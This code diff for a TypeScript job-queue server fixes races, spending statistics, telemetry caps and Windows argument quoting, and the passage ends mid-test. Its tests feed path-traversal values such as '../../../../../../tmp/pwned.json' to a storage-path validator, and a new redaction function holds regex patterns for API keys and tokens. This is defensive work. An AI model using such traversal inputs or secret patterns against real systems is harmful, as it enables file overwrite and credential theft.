     const nextJobId = this._queue.splice(readyIndex, 1)[0]
+    // A3: reserve the active slot SYNCHRONOUSLY, before _startJob's awaits
+    // (plugin verify, profile snapshot). Otherwise a second _drainQueue triggered
+    // during those awaits (a concurrent /spawn, or the synchronous N-job loop of
+    // an Ultracode rail launch) still sees _activeJobId === null and starts a
+    // second job in the same working tree, with _activeProcess/_activeJobId then
+    // clobbered so cancel/zombie-kill hits the wrong child.
+    this._activeJobId = nextJobId
     this._recomputePositions()
-    this._startJob(nextJobId)
+    void this._startJob(nextJobId).catch((err) => {
+      console.error(`[QueueManager] _startJob(${nextJobId}) threw before spawn: ${(err as Error)?.message}`)
+      // Only release if we never established a child (else _onJobExit owns cleanup).
+      if (this._activeJobId === nextJobId && this._activeProcess === null) {
+        this._activeJobId = null
+        this._drainQueue()
+      }
+    })
   }
 
   /**
@@ -713,7 +745,13 @@ export class QueueManager {
 
   private async _startJob(jobId: string): Promise<void> {
     const job = this._jobs.get(jobId)
-    if (!job) return
+    if (!job) {
+      // Job vanished between the synchronous slot reservation in _drainQueue and
+      // here — release the reserved slot and move on (A3).
+      if (this._activeJobId === jobId) this._activeJobId = null
+      this._drainQueue()
+      return
+    }
 
     // Per-job adapter (multi-provider). `this._adapter` stays the project
     // primary; everything in this spawn (binary, argv, model, profile, OTEL,
@@ -1179,6 +1217,14 @@ export class QueueManager {
     const snapshot = this._snapshotRefs.get(jobId)
     this._snapshotRefs.delete(jobId)
 
+    // A3: release the active slot for THIS job before any early return, so a
+    // disposed/unknown-job exit can never leave the slot reserved (which would
+    // wedge the queue). Guarded by identity in case a stale exit fires late.
+    if (this._activeJobId === jobId) {
+      this._activeProcess = null
+      this._activeJobId = null
+    }
+
     // The manager was torn down (e.g. project removed) while the child was
     // still running. The DB may be closed; skip all bookkeeping to avoid an
     // uncaught throw inside this EventEmitter 'close' listener.
@@ -1212,8 +1258,8 @@ export class QueueManager {
       job.resultText = lastResultEvent.result
     }
 
-    this._activeProcess = null
-    this._activeJobId = null
+    // (_activeProcess/_activeJobId already released above, before the early
+    // returns, so the slot is freed on every exit path — A3.)
 
     if (this._db) {
       // Adapter-driven result finalisation handles tokens, cost (or pricing-

--- a/server/rails-router.test.ts
+++ b/server/rails-router.test.ts
@@ -256,3 +256,64 @@ describe('rails-router POST /:railIndex/launch ultracode mode', () => {
     expect((enqueue.mock.calls[0][2] as { model?: string }).model).toBeUndefined()
   })
 })
+
+describe('rails-router POST /:railIndex/stop (M19)', () => {
+  let db: DbInstance
+  beforeEach(() => { db = initDb(':memory:') })
+  afterEach(() => { db.close() })
+
+  function appWithRailJobs(railJobs: Map<string, unknown>, cancel: ReturnType<typeof vi.fn>) {
+    const app = express()
+    app.use(express.json())
+    app.use((req, _res, next) => {
+      ;(req as unknown as { projectCtx: unknown }).projectCtx = {
+        db, railJobs,
+        project: { id: 'p1', slug: 's1', provider: 'claude', providers: ['claude'] },
+        queueManager: { cancel },
+        broadcast: () => {},
+      }
+      next()
+    })
+    app.use('/rails', createRailsRouter())
+    return app
+  }
+
+  it('cancels ALL jobs of the rail, not just the first', async () => {
+    // Ultracode rail registered 3 jobs under railIndex 0 (+ one for another rail).
+    const railJobs = new Map<string, unknown>([
+      ['job-a', { railIndex: 0, mode: 'ultracode', ticketIds: [1] }],
+      ['job-b', { railIndex: 0, mode: 'ultracode', ticketIds: [2] }],
+      ['job-c', { railIndex: 0, mode: 'ultracode', ticketIds: [3] }],
+      ['other', { railIndex: 1, mode: 'ultracode', ticketIds: [9] }],
+    ])
+    const cancel = vi.fn().mockReturnValue('canceled')
+
+    const res = await request(appWithRailJobs(railJobs, cancel)).post('/rails/0/stop').send({})
+
+    expect(res.status).toBe(200)
+    expect(cancel).toHaveBeenCalledTimes(3)
+    expect(res.body.jobIds).toEqual(['job-a', 'job-b', 'job-c'])
+    // All rail-0 entries removed; the other rail's entry is untouched.
+    expect(railJobs.has('job-a')).toBe(false)
+    expect(railJobs.has('job-b')).toBe(false)
+    expect(railJobs.has('job-c')).toBe(false)
+    expect(railJobs.has('other')).toBe(true)
+  })
+
+  it('still clears stale entries when cancel throws (unrecoverable-rail fix)', async () => {
+    const railJobs = new Map<string, unknown>([
+      ['stale', { railIndex: 0, mode: 'ultracode', ticketIds: [1] }],
+    ])
+    const cancel = vi.fn().mockImplementation(() => { throw new Error('already terminal') })
+
+    const res = await request(appWithRailJobs(railJobs, cancel)).post('/rails/0/stop').send({})
+
+    expect(res.status).toBe(200)
+    expect(railJobs.has('stale')).toBe(false) // cleaned up despite the throw
+  })
+
+  it('404s when the rail has no jobs', async () => {
+    const res = await request(appWithRailJobs(new Map(), vi.fn())).post('/rails/0/stop').send({})
+    expect(res.status).toBe(404)
+  })
+})

--- a/server/rails-router.ts
+++ b/server/rails-router.ts
@@ -269,36 +269,43 @@ export function createRailsRouter(): Router {
 
     const c = ctx(req)
 
-    // Find the active rail job for this rail index
-    let targetJobId: string | undefined
-    for (const [jobId, meta] of c.railJobs.entries()) {
-      if (meta.railIndex === railIndex) {
-        targetJobId = jobId
-        break
-      }
-    }
+    // M19: an Ultracode rail registers ONE queue job per ticket. The old code
+    // stopped only the FIRST matching job, so the remaining N-1 jobs kept running
+    // and billing while the UI showed the rail stopped. Collect ALL jobs for this
+    // rail index and cancel each (running → kill, queued → cancel).
+    const targetJobIds = Array.from(c.railJobs.entries())
+      .filter(([, meta]) => meta.railIndex === railIndex)
+      .map(([jobId]) => jobId)
 
-    if (!targetJobId) {
+    if (targetJobIds.length === 0) {
       res.status(404).json({ error: 'No active rail job found for this rail' }); return
     }
 
-    try {
-      c.queueManager.cancel(targetJobId)
-      c.railJobs.delete(targetJobId)
+    let canceledCount = 0
+    for (const jobId of targetJobIds) {
+      try {
+        c.queueManager.cancel(jobId)
+        canceledCount++
+      } catch (err) {
+        // Already terminal / unknown — clean up the stale entry regardless so the
+        // rail card can't get wedged 'running' (this was the unrecoverable case).
+        console.warn(`[rails-router] stop: cancel(${jobId}) failed: ${(err as Error).message}`)
+      }
+      c.railJobs.delete(jobId)
+    }
 
+    // Broadcast one stop per job so every rail card reconciles.
+    for (const jobId of targetJobIds) {
       const stopMsg: RailJobStoppedMessage = {
         type: 'rail.job_stopped',
         projectId: c.project.id,
         railIndex,
-        jobId: targetJobId,
+        jobId,
       }
       c.broadcast(stopMsg)
-
-      res.json({ ok: true, jobId: targetJobId })
-    } catch (err) {
-      console.error('[rails-router] stop error:', err)
-      res.status(500).json({ error: 'Failed to stop rail job' })
     }
+
+    res.json({ ok: true, jobIds: targetJobIds, canceled: canceledCount })
   })
 
   return router

--- a/server/setup-manager.ts
+++ b/server/setup-manager.ts
@@ -7,6 +7,7 @@ import treeKill from 'tree-kill'
 import type { WsMessage } from './types'
 import { findCoreContract, detectCLISync, CLIProvider } from './core-compat'
 import { spawnAiCli } from './util/cli-prompt'
+import { spawnCli } from './util/win-spawn'
 import { formatMissingSetupPrerequisites } from './setup-prerequisites'
 import { getAdapter } from './providers'
 import type { ProviderAdapter, SpawnAction } from './providers/types'
@@ -58,12 +59,15 @@ function buildCoreArgs(args: string[]): { bin: string; fullArgs: string[] } {
 function spawnCoreInit(args: string[], cwd: string): ChildProcess {
   const { bin, fullArgs } = buildCoreArgs(['init', ...args])
   console.log(`[SetupManager] spawning core: ${bin} ${fullArgs.join(' ')} (cwd=${cwd}) (SPECRAILS_CORE_BIN=${process.env.SPECRAILS_CORE_BIN ?? '<unset>'})`)
-  return spawn(bin, fullArgs, {
+  // M15: use the cross-spawn wrapper instead of `spawn(..., { shell: win32 })`.
+  // With shell:true, Node concatenates the argv into one cmd.exe command line and
+  // does NOT quote individual args, so `--from-config C:\Users\John Doe\...yaml`
+  // (and `--root-dir <path with spaces>`) split on the space and break install on
+  // any Windows account/project path containing a space. cross-spawn resolves the
+  // .cmd shim AND quotes each arg, so spaces (and newlines) survive intact.
+  return spawnCli(bin, fullArgs, {
     cwd,
     env: process.env,
-    // npx / specrails-hub / claude / codex are .cmd shims on Windows;
-    // Node requires shell: true for .cmd after CVE-2024-27980.
-    shell: process.platform === 'win32',
     stdio: ['ignore', 'pipe', 'pipe'],
   })
 }

--- a/server/smash-runner.test.ts
+++ b/server/smash-runner.test.ts
@@ -266,6 +266,21 @@ describe('applySmashUndo', () => {
     expect((store.tickets['1'].metadata as { pre_smash_status?: string }).pre_smash_status).toBeUndefined()
   })
 
+  it('B61: restores a pre-SMASH "done" status instead of demoting to todo', () => {
+    seedTicket(projectPath, { id: 1, status: 'done' })
+    const filePath = resolveTicketStoragePath(projectPath)
+    applySmashToStore(
+      filePath,
+      1,
+      [{ title: 'A', description: 'da', priority: 'high', executionOrder: 1, rationale: 'r' }],
+      '2026-05-16T12:00:00Z',
+      'sr-specs-smash',
+    )
+    const undone = applySmashUndo(filePath, 1, '2026-05-16T12:00:00Z', '2026-05-16T12:00:30Z')
+    expect(undone.epic?.is_epic).toBe(false)
+    expect(undone.epic?.status).toBe('done') // not demoted to 'todo'
+  })
+
   it('is a no-op when ticket is not an épica', () => {
     seedTicket(projectPath, { id: 1 })
     const filePath = resolveTicketStoragePath(projectPath)
@@ -392,6 +407,28 @@ describe('runSmash', () => {
     for (const row of rows) {
       expect(row.total_cost_usd).toBeCloseTo(0.0005, 5)
     }
+  })
+
+  it('B60: rejects a concurrent SMASH of the same ticket (in-progress guard)', async () => {
+    seedTicket(projectPath, { id: 1 })
+    const deps = {
+      db,
+      projectId: 'proj-1',
+      projectSlug: 'proj-1',
+      projectPath,
+      projectName: 'P',
+      broadcast: () => {},
+      spawn: fakeSpawn(streamLines(validSmashBlock(4))),
+      timeoutMs: 5000,
+    }
+    // p1 takes the in-flight slot synchronously (before its first await); the
+    // concurrent call sees it and is rejected instead of duplicating children.
+    const p1 = runSmash(deps, 1)
+    const r2 = await runSmash(deps, 1)
+    expect(r2.ok).toBe(false)
+    expect(r2.reason).toBe('in-progress')
+    const r1 = await p1
+    expect(r1.ok).toBe(true) // first one completes normally and releases the slot
   })
 
   it('completes successfully and inserts children', async () => {

--- a/server/smash-runner.ts
+++ b/server/smash-runner.ts
@@ -52,6 +52,7 @@ export type SmashFailureReason =
   | 'timeout'
   | 'invalid-output'
   | 'mutation-failed'
+  | 'in-progress'
 
 export interface SmashDeps {
   db: DbInstance
@@ -349,9 +350,13 @@ export function applySmashUndo(
     }
     target.is_epic = false
     // Restore the pre-SMASH status from metadata if available.
+    // B61: 'done' was missing from this whitelist, so undoing a SMASH on a ticket
+    // that was 'done' before silently demoted it to 'todo'. Include every valid
+    // non-epic status.
     const md = (target.metadata ?? {}) as { pre_smash_status?: string }
     if (md.pre_smash_status === 'todo' || md.pre_smash_status === 'in_progress'
-        || md.pre_smash_status === 'cancelled' || md.pre_smash_status === 'draft') {
+        || md.pre_smash_status === 'cancelled' || md.pre_smash_status === 'draft'
+        || md.pre_smash_status === 'done') {
       target.status = md.pre_smash_status
     } else {
       target.status = 'todo'
@@ -478,6 +483,12 @@ function recordChildrenInvocations(
 /**
  * Fire a SMASH attempt for a single ticket.
  */
+// B60: in-process guard against concurrent SMASH of the same ticket. Eligibility
+// is checked pre-spawn (not under the store lock), so two near-simultaneous
+// requests would both pass the gate and each spawn a child set → duplicates.
+// Keyed by `${projectId}:${ticketId}` so distinct projects don't collide.
+const _smashInFlight = new Set<string>()
+
 export async function runSmash(
   deps: SmashDeps,
   ticketId: number,
@@ -494,6 +505,16 @@ export async function runSmash(
   if (isSpecsSmashKillSwitchActive()) {
     return { ok: false, reason: 'disabled', ticketId, runId }
   }
+
+  // B60: reject a concurrent SMASH of the same ticket. The has-check + add are
+  // synchronous (no await between them), so they close the TOCTOU window the
+  // pre-flight eligibility check leaves open. Released in the finally below.
+  const inFlightKey = `${deps.projectId}:${ticketId}`
+  if (_smashInFlight.has(inFlightKey)) {
+    return { ok: false, reason: 'in-progress', ticketId, runId }
+  }
+  _smashInFlight.add(inFlightKey)
+  try {
 
   // Pre-flight: read store and check eligibility.
   const filePath = resolveTicketStoragePath(deps.projectPath)
@@ -686,6 +707,10 @@ export async function runSmash(
     ticketId,
     runId,
     childrenIds: applied.children.map((c) => c.id),
+  }
+  } finally {
+    // B60: always release the in-flight guard (success, failure, or throw).
+    _smashInFlight.delete(inFlightKey)
   }
 }
 

--- a/server/spec-launcher-manager.ts
+++ b/server/spec-launcher-manager.ts
@@ -24,6 +24,20 @@ export class SpecLauncherManager {
     return this._activeProcesses.has(launchId)
   }
 
+  /**
+   * Tear down before the project is removed (M12). This manager holds no DB
+   * handle (its close handler only broadcasts), so it cannot crash the hub — but
+   * an orphaned `/opsx:ff` child runs with --dangerously-skip-permissions against
+   * a removed project and keeps burning spend, so SIGTERM it. Idempotent.
+   */
+  shutdown(): void {
+    for (const child of this._activeProcesses.values()) {
+      if (child.pid) { try { treeKill(child.pid, 'SIGTERM') } catch { /* ignore */ } }
+    }
+    this._activeProcesses.clear()
+    this._buffers.clear()
+  }
+
   async launch(launchId: string, description: string): Promise<void> {
     const rawCommand = `/opsx:ff ${description}`
     const prompt = resolveCommand(rawCommand, this._cwd)

--- a/server/spending.test.ts
+++ b/server/spending.test.ts
@@ -332,4 +332,62 @@ describe('getSpending edge cases', () => {
     const r = getSpending(db, 'p1', { period: 'all', ticketId: 7 })
     expect(r.summary.totalCostUsd).toBe(1)
   })
+
+  // M18: byMode counts DISTINCT tickets, not rows.
+  it('byMode ticketsCreated counts distinct tickets, not turn rows', () => {
+    const now = new Date().toISOString()
+    // One Explore spec, 3 turn-rows all back-filled with the same ticket_id.
+    seed(db, [
+      { id: 'e1', surface: 'explore-spec', status: 'success', ticket_id: 42, total_cost_usd: 1, conversation_id: 'c1', started_at: now },
+      { id: 'e2', surface: 'explore-spec', status: 'success', ticket_id: 42, total_cost_usd: 2, conversation_id: 'c1', started_at: now },
+      { id: 'e3', surface: 'explore-spec', status: 'success', ticket_id: 42, total_cost_usd: 3, conversation_id: 'c1', started_at: now },
+    ])
+    const r = getSpending(db, 'p1', { period: 'all' })
+    const explore = r.byMode.find((m) => m.mode === 'explore')!
+    expect(explore.totalRuns).toBe(3)        // 3 turn rows
+    expect(explore.ticketsCreated).toBe(1)   // but only ONE ticket
+    // avgCostPerSpec = total success ticket cost (6) / distinct successful tickets (1)
+    expect(explore.avgCostPerSpec).toBeCloseTo(6)
+  })
+})
+
+describe('daily timeline (B58/B63)', () => {
+  let db: DbInstance
+  beforeEach(() => { db = initDb(':memory:') })
+
+  it('B58: timeline stacks file-summary cost into fileSummaryCostUsd', () => {
+    const now = new Date().toISOString()
+    seed(db, [
+      { id: 'fs', surface: 'file-summary', status: 'success', total_cost_usd: 0.5, started_at: now },
+    ])
+    const r = getSpending(db, 'p1', { period: '30d' })
+    const total = r.dailyTimeline.reduce((s, d) => s + d.fileSummaryCostUsd, 0)
+    expect(total).toBeCloseTo(0.5)
+  })
+
+  it('B63: period "all" does not zero-fill from 1970 (bounded timeline)', () => {
+    const now = new Date().toISOString()
+    seed(db, [{ id: 'a', surface: 'job', status: 'success', total_cost_usd: 1, started_at: now }])
+    const r = getSpending(db, 'p1', { period: 'all' })
+    // Clamped to the first day with data → a handful of entries, not ~20k.
+    expect(r.dailyTimeline.length).toBeLessThan(5)
+  })
+
+  it('B63: period "all" with no data yields an empty-ish timeline, not 20k days', () => {
+    const r = getSpending(db, 'p1', { period: 'all' })
+    expect(r.dailyTimeline.length).toBeLessThanOrEqual(1)
+  })
+})
+
+describe('parseSpendingFilters surface validation (M17)', () => {
+  it('accepts smash and file-summary surfaces', () => {
+    expect(parseSpendingFilters({ surface: 'smash' }).surface).toEqual(['smash'])
+    expect(parseSpendingFilters({ surface: 'file-summary' }).surface).toEqual(['file-summary'])
+  })
+  it('keeps mixed valid surfaces intact (does not silently drop smash)', () => {
+    expect(parseSpendingFilters({ surface: 'job,smash' }).surface).toEqual(['job', 'smash'])
+  })
+  it('drops unknown surfaces', () => {
+    expect(parseSpendingFilters({ surface: 'job,bogus' }).surface).toEqual(['job'])
+  })
 })

--- a/server/spending.ts
+++ b/server/spending.ts
@@ -31,6 +31,7 @@ export interface DailyEntry {
   exploreCostUsd: number
   aiEditCostUsd: number
   smashCostUsd: number
+  fileSummaryCostUsd: number
   totalCostUsd: number
 }
 export interface ScatterPoint {
@@ -290,11 +291,20 @@ export function getSpending(
     FROM ai_invocations WHERE ${where.sql}
     GROUP BY day, surface
   `).all(...where.params) as RowAggDay[]
-  const days = eachDay(range.from, range.to)
+  // B63: period 'all' resolves range.from to 1970, which would make eachDay emit
+  // ~20,000 zero-filled days (a huge payload + 20k-bar chart). Clamp the zero-fill
+  // start to the first day that actually has data (or a single day when empty).
+  let timelineFrom = range.from
+  if (filters.period === 'all') {
+    timelineFrom = dayRows.length > 0
+      ? dayRows.reduce((min, r) => (r.day < min ? r.day : min), dayRows[0].day)
+      : range.to.slice(0, 10)
+  }
+  const days = eachDay(timelineFrom, range.to)
   const dayMap = new Map<string, DailyEntry>()
   for (const day of days) {
     dayMap.set(day, {
-      date: day, jobsCostUsd: 0, quickCostUsd: 0, exploreCostUsd: 0, aiEditCostUsd: 0, smashCostUsd: 0, totalCostUsd: 0,
+      date: day, jobsCostUsd: 0, quickCostUsd: 0, exploreCostUsd: 0, aiEditCostUsd: 0, smashCostUsd: 0, fileSummaryCostUsd: 0, totalCostUsd: 0,
     })
   }
   for (const r of dayRows) {
@@ -306,6 +316,7 @@ export function getSpending(
     else if (r.surface === 'explore-spec') entry.exploreCostUsd += c
     else if (r.surface === 'ai-edit') entry.aiEditCostUsd += c
     else if (r.surface === 'smash') entry.smashCostUsd += c
+    else if (r.surface === 'file-summary') entry.fileSummaryCostUsd += c // B58
     entry.totalCostUsd += c
   }
   const dailyTimeline = Array.from(dayMap.values())
@@ -313,21 +324,29 @@ export function getSpending(
   // byMode (Quick vs Explore)
   const byMode: ByModeEntry[] = (['quick-spec', 'explore-spec'] as const).map((surface) => {
     const modeKey: 'quick' | 'explore' = surface === 'quick-spec' ? 'quick' : 'explore'
+    // M18: count DISTINCT tickets, not rows. An Explore session writes one
+    // ai_invocations row per turn (and contract-refine adds another), all
+    // back-filled with the same ticket_id — so SUM(ticket_id IS NOT NULL) counted
+    // turns and inflated "N created". avgCostPerSpec is likewise per-spec:
+    // total success cost of ticket-bearing rows / distinct successful tickets.
     const r = db.prepare(`
       SELECT
         COUNT(*) AS totalRuns,
-        SUM(CASE WHEN ticket_id IS NOT NULL THEN 1 ELSE 0 END) AS ticketsCreated,
+        COUNT(DISTINCT ticket_id) AS ticketsCreated,
         COALESCE(SUM(total_cost_usd), 0) AS totalCost,
-        AVG(CASE WHEN status = 'success' AND ticket_id IS NOT NULL THEN total_cost_usd END) AS avgCostPerSpec,
+        COALESCE(SUM(CASE WHEN status = 'success' AND ticket_id IS NOT NULL THEN total_cost_usd ELSE 0 END), 0) AS specCostSum,
+        COUNT(DISTINCT CASE WHEN status = 'success' AND ticket_id IS NOT NULL THEN ticket_id END) AS specCount,
         AVG(CASE WHEN status = 'success' THEN duration_ms END) AS avgDur
       FROM ai_invocations WHERE ${where.sql} AND surface = ?
     `).get(...where.params, surface) as {
       totalRuns: number
       ticketsCreated: number | null
       totalCost: number
-      avgCostPerSpec: number | null
+      specCostSum: number
+      specCount: number
       avgDur: number | null
     }
+    const avgCostPerSpec = r.specCount > 0 ? r.specCostSum / r.specCount : null
     const dom = db.prepare(`
       SELECT model, COUNT(*) AS cnt FROM ai_invocations
       WHERE ${where.sql} AND surface = ? AND model IS NOT NULL
@@ -345,7 +364,7 @@ export function getSpending(
       totalRuns: r.totalRuns,
       ticketsCreated: r.ticketsCreated ?? 0,
       totalCostUsd: r.totalCost,
-      avgCostPerSpec: r.avgCostPerSpec,
+      avgCostPerSpec,
       avgDurationMs: r.avgDur,
       dominantModel: dom?.model ?? null,
       sparkline,
@@ -559,8 +578,12 @@ export function parseSpendingFilters(query: Record<string, unknown>): SpendingFi
   if (typeof query.from === 'string') f.from = query.from
   if (typeof query.to === 'string') f.to = query.to
   if (typeof query.surface === 'string') {
+    // M17: validate against the canonical surface list. The old hardcoded subset
+    // silently dropped 'smash'/'file-summary' — clicking those chips produced an
+    // empty filter array, so buildWhere applied NO surface condition and the UI
+    // showed ALL-surface totals while claiming a single-surface filter was active.
     f.surface = query.surface.split(',').filter((s) =>
-      ['job', 'quick-spec', 'explore-spec', 'ai-edit'].includes(s)
+      (ALL_SURFACES as string[]).includes(s)
     ) as Surface[]
   }
   if (typeof query.model === 'string') {

--- a/server/telemetry-export.test.ts
+++ b/server/telemetry-export.test.ts
@@ -3,7 +3,7 @@ import fs from 'fs'
 import os from 'os'
 import path from 'path'
 import zlib from 'zlib'
-import { createDiagnosticZip } from './telemetry-export'
+import { createDiagnosticZip, redactSecrets } from './telemetry-export'
 import type { DiagnosticZipOpts } from './telemetry-export'
 import type { JobRow, EventRow } from './types'
 import type { TelemetryBlobRow } from './db'
@@ -322,5 +322,22 @@ describe('createDiagnosticZip — optional job fields', () => {
     })
     const str = buf.toString('utf-8')
     expect(str).toContain('NOT_JSON')
+  })
+})
+
+describe('redactSecrets (B52)', () => {
+  it('redacts KEY=VALUE secrets', () => {
+    expect(redactSecrets('export ANTHROPIC_API_KEY=sk-ant-abc123xyz')).toContain('[REDACTED]')
+    expect(redactSecrets('export ANTHROPIC_API_KEY=sk-ant-abc123xyz')).not.toContain('abc123xyz')
+    expect(redactSecrets('GITHUB_TOKEN: ghp_aaaaaaaaaaaaaaaaaaaa')).toContain('[REDACTED]')
+  })
+  it('redacts provider key prefixes and bearer tokens', () => {
+    expect(redactSecrets('key sk-abcdefghijklmnopqrstu used')).toContain('sk-[REDACTED]')
+    expect(redactSecrets('Authorization: Bearer abcdef0123456789xyz')).toContain('Bearer [REDACTED]')
+    expect(redactSecrets('token ghp_0123456789abcdef0123')).toContain('gh_[REDACTED]')
+  })
+  it('leaves ordinary log text untouched', () => {
+    const line = 'Running phase architect on ticket #42 (2 turns)'
+    expect(redactSecrets(line)).toBe(line)
   })
 })

--- a/server/telemetry-export.ts
+++ b/server/telemetry-export.ts
@@ -222,9 +222,26 @@ function buildLogsFromEvents(events: EventRow[]): string {
       // Payload isn't JSON — use raw string as-is
     }
 
-    lines.push(`[${ts}] [${src}] ${text}`)
+    lines.push(`[${ts}] [${src}] ${redactSecrets(text)}`)
   }
   return lines.join('\n') + '\n'
+}
+
+/**
+ * Best-effort redaction of obvious secrets from diagnostic log text (B52). The
+ * exported ZIP is meant to be shared (support, bug reports), but the CLI event
+ * log can echo `export ANTHROPIC_API_KEY=...`, Bearer tokens, or provider keys.
+ * This scrubs the common shapes without destroying the log's diagnostic value.
+ */
+export function redactSecrets(text: string): string {
+  return text
+    // KEY=VALUE / TOKEN: VALUE for anything ending in API_KEY/TOKEN/SECRET/PASSWORD/ACCESS_KEY
+    .replace(/\b([A-Za-z0-9_]*(?:API_KEY|TOKEN|SECRET|PASSWORD|ACCESS_KEY))(\s*[=:]\s*)(["']?)[^\s"']+\3/gi, '$1$2[REDACTED]')
+    // Provider key prefixes (Anthropic/OpenAI sk-..., GitHub gh*_...)
+    .replace(/\bsk-[A-Za-z0-9_-]{16,}/g, 'sk-[REDACTED]')
+    .replace(/\bgh[pousr]_[A-Za-z0-9]{16,}/g, 'gh_[REDACTED]')
+    // Authorization: Bearer <token>
+    .replace(/\b(Bearer)\s+[A-Za-z0-9._-]{12,}/gi, '$1 [REDACTED]')
 }
 
 // ─── Public API ───────────────────────────────────────────────────────────────

--- a/server/telemetry-receiver.ts
+++ b/server/telemetry-receiver.ts
@@ -9,6 +9,10 @@ import { getTelemetryBlob, upsertTelemetryBlob } from './db'
 
 // 10 MB uncompressed cap per job blob
 const BLOB_SIZE_CAP = 10 * 1024 * 1024
+// B2: the soft cap above only dropped `logs`, so traces/metrics could grow a
+// per-job blob without bound (disk-fill DoS). This hard cap bounds the TOTAL
+// blob across ALL signals while still letting traces/metrics outlive logs.
+const BLOB_HARD_CAP = 50 * 1024 * 1024
 
 // Bounded in-memory append queue per (projectId, jobId) key — protects the
 // Express event loop from a burst of OTLP payloads all trying to gzip-append
@@ -187,8 +191,10 @@ async function handleIngest(
   const filePath = blobPath(project.slug, jobId)
   const now = Date.now()
 
-  // Cap enforcement: drop logs once 10 MB is reached
-  if (state.uncompressedSize >= BLOB_SIZE_CAP && signal === 'logs') {
+  // Cap enforcement: drop logs once the 10 MB soft cap is reached (B2: and drop
+  // ANY signal — traces/metrics included — once the 50 MB hard cap is reached, so
+  // a job streaming endless spans can't fill the disk).
+  if (state.uncompressedSize >= BLOB_HARD_CAP || (state.uncompressedSize >= BLOB_SIZE_CAP && signal === 'logs')) {
     res.status(200).json({ ok: true, dropped: true })
     return
   }

--- a/server/ticket-store.ts
+++ b/server/ticket-store.ts
@@ -96,20 +96,40 @@ const LOCK_STALE_MS = 10_000 // 10 seconds
 
 // ─── Path resolution ─────────────────────────────────────────────────────────
 
+/** True when `candidate` resolves to a path inside (or equal to) `root`. */
+function isContainedIn(root: string, candidate: string): boolean {
+  const normalizedRoot = path.resolve(root)
+  const rel = path.relative(normalizedRoot, candidate)
+  // Inside the root: relative path is non-empty, does not climb out with '..',
+  // and is not absolute (which path.relative returns when on a different drive).
+  return rel !== '' && !rel.startsWith('..') && !path.isAbsolute(rel)
+}
+
 export function resolveTicketStoragePath(projectPath: string): string {
+  const fallback = path.resolve(projectPath, DEFAULT_STORAGE_PATH)
   // Try to read ticketProvider.storagePath from integration-contract.json
   const contractPath = path.join(projectPath, '.claude', 'integration-contract.json')
   if (fs.existsSync(contractPath)) {
     try {
       const contract = JSON.parse(fs.readFileSync(contractPath, 'utf-8'))
       if (contract.ticketProvider?.storagePath) {
-        return path.resolve(projectPath, contract.ticketProvider.storagePath)
+        const resolved = path.resolve(projectPath, contract.ticketProvider.storagePath)
+        // A2: integration-contract.json is read FROM THE PROJECT REPO and is
+        // therefore untrusted (a hostile repo added as a project). path.resolve
+        // lets an absolute or '../../..'-escaping storagePath redirect the ticket
+        // store to ANY file on disk — and every ticket mutation then overwrites
+        // that file via writeStore(). Reject anything outside the project root
+        // and fall back to the default location.
+        if (isContainedIn(projectPath, resolved)) {
+          return resolved
+        }
+        console.warn(`[ticket-store] ignoring out-of-project storagePath from integration-contract.json: ${contract.ticketProvider.storagePath}`)
       }
     } catch {
       // Fall through to default
     }
   }
-  return path.resolve(projectPath, DEFAULT_STORAGE_PATH)
+  return fallback
 }
 
 // ─── Advisory file locking ───────────────────────────────────────────────────

--- a/server/ticket-store.unit.test.ts
+++ b/server/ticket-store.unit.test.ts
@@ -430,6 +430,29 @@ describe('resolveTicketStoragePath', () => {
     const result = resolveTicketStoragePath(tmpDir)
     expect(result).toBe(path.resolve(tmpDir, '.specrails/local-tickets.json'))
   })
+
+  // A2: a hostile repo's integration-contract.json must not redirect the store
+  // outside the project root (would make every ticket write overwrite that file).
+  it('rejects a ../-escaping storagePath and falls back to default', () => {
+    const claudeDir = path.join(tmpDir, '.claude')
+    fs.mkdirSync(claudeDir, { recursive: true })
+    fs.writeFileSync(path.join(claudeDir, 'integration-contract.json'), JSON.stringify({
+      ticketProvider: { storagePath: '../../../../../../tmp/pwned.json' },
+    }))
+    const result = resolveTicketStoragePath(tmpDir)
+    expect(result).toBe(path.resolve(tmpDir, '.specrails/local-tickets.json'))
+  })
+
+  it('rejects an absolute out-of-project storagePath and falls back to default', () => {
+    const outside = path.join(os.tmpdir(), `evil-${process.pid}.json`)
+    const claudeDir = path.join(tmpDir, '.claude')
+    fs.mkdirSync(claudeDir, { recursive: true })
+    fs.writeFileSync(path.join(claudeDir, 'integration-contract.json'), JSON.stringify({
+      ticketProvider: { storagePath: outside },
+    }))
+    const result = resolveTicketStoragePath(tmpDir)
+    expect(result).toBe(path.resolve(tmpDir, '.specrails/local-tickets.json'))
+  })
 })
 
 // ─── isValidStatus / isValidPriority ─────────────────────────────────────────

--- a/server/util/secure-fs.test.ts
+++ b/server/util/secure-fs.test.ts
@@ -1,0 +1,77 @@
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
+import fs from 'fs'
+import os from 'os'
+import path from 'path'
+import { secureDir, secureDbFile } from './secure-fs'
+
+describe('secure-fs (H-13 permissions)', () => {
+  // eslint-disable-next-line @typescript-eslint/no-explicit-any
+  let chmodSpy: any
+  const realPlatform = process.platform
+
+  beforeEach(() => {
+    chmodSpy = vi.spyOn(fs, 'chmodSync').mockReturnValue(undefined)
+  })
+
+  afterEach(() => {
+    chmodSpy.mockRestore()
+    Object.defineProperty(process, 'platform', { value: realPlatform })
+  })
+
+  function setPlatform(p: string) {
+    Object.defineProperty(process, 'platform', { value: p })
+  }
+
+  describe('on POSIX', () => {
+    beforeEach(() => setPlatform('darwin'))
+
+    it('secureDir chmods the directory to 0700', () => {
+      secureDir('/some/dir')
+      expect(chmodSpy).toHaveBeenCalledWith('/some/dir', 0o700)
+    })
+
+    it('secureDbFile chmods the db and both WAL sidecars to 0600', () => {
+      secureDbFile('/some/jobs.sqlite')
+      expect(chmodSpy).toHaveBeenCalledWith('/some/jobs.sqlite', 0o600)
+      expect(chmodSpy).toHaveBeenCalledWith('/some/jobs.sqlite-wal', 0o600)
+      expect(chmodSpy).toHaveBeenCalledWith('/some/jobs.sqlite-shm', 0o600)
+    })
+
+    it('secureDbFile skips :memory:', () => {
+      secureDbFile(':memory:')
+      expect(chmodSpy).not.toHaveBeenCalled()
+    })
+
+    it('never throws when chmod fails (best-effort)', () => {
+      chmodSpy.mockImplementation(() => { throw new Error('EPERM') })
+      expect(() => secureDir('/x')).not.toThrow()
+      expect(() => secureDbFile('/x.sqlite')).not.toThrow()
+    })
+
+    it('actually restricts a real temp dir and file end-to-end', () => {
